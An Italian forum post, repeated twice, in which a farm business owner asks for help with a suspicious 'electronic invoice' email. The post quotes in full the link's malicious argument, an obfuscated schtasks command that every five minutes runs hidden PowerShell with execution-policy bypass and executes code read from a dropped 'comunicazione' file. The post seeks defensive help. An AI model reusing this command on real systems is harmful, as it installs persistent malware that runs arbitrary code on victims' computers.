Buongiorno
Mi scuso per il disturbo. Oggi sulla nostra pec aziendale (azienda agricola) sono arrivati con una email che indicava come fattura elettronica dei file allegati: un pdf e un link. il pdf non si apre e link apparentemente non fa nulla. Mi insospettisco. Non so se allegare qui i due file che potrebbero (sono quasi sicuro essere virus).
Il link aveva con argomento: C:\Windows\System32\schtasks.exe /F /Create /sc minute /MO 5 /TN "AI" /ST 04:21 /TR "cmd /c p%os:~4,1%wershell -eP bypAss -win 1 -c '&{cd %public:~-15,8%\;$k=ls -r -force -in comunicazione*.*|select -last 1;cat -LiteralPath $k|select -last 1|iex}'"
Vedo che avvia un task che itera: cmd /c p%os:~4,1%wershell -eP bypAss -win 1 -c '&{cd %public:~-15,8%\;$k=ls -r -force -in comunicazione*.*|select -last 1;cat -LiteralPath $k|select -last 1|iex}'"
Che cosa è questo ultimo lungo comando invocato da schtasks?
Ho norton security installato e aggiornato che non rileva nessuna minaccia ne postando i file allegati sui siti di scansione rileva alcuna minaccia.
Il task AI avviato dal link l'ho cancellato manualmente dai task, e ok. Ma il resto del comando cosa fa esattamente?
Grazie
Mi scuso per il disturbo. Oggi sulla nostra pec aziendale (azienda agricola) sono arrivati con una email che indicava come fattura elettronica dei file allegati: un pdf e un link. il pdf non si apre e link apparentemente non fa nulla. Mi insospettisco. Non so se allegare qui i due file che potrebbero (sono quasi sicuro essere virus).
Il link aveva con argomento: C:\Windows\System32\schtasks.exe /F /Create /sc minute /MO 5 /TN "AI" /ST 04:21 /TR "cmd /c p%os:~4,1%wershell -eP bypAss -win 1 -c '&{cd %public:~-15,8%\;$k=ls -r -force -in comunicazione*.*|select -last 1;cat -LiteralPath $k|select -last 1|iex}'"
Vedo che avvia un task che itera: cmd /c p%os:~4,1%wershell -eP bypAss -win 1 -c '&{cd %public:~-15,8%\;$k=ls -r -force -in comunicazione*.*|select -last 1;cat -LiteralPath $k|select -last 1|iex}'"
Che cosa è questo ultimo lungo comando invocato da schtasks?
Ho norton security installato e aggiornato che non rileva nessuna minaccia ne postando i file allegati sui siti di scansione rileva alcuna minaccia.
Il task AI avviato dal link l'ho cancellato manualmente dai task, e ok. Ma il resto del comando cosa fa esattamente?
Grazie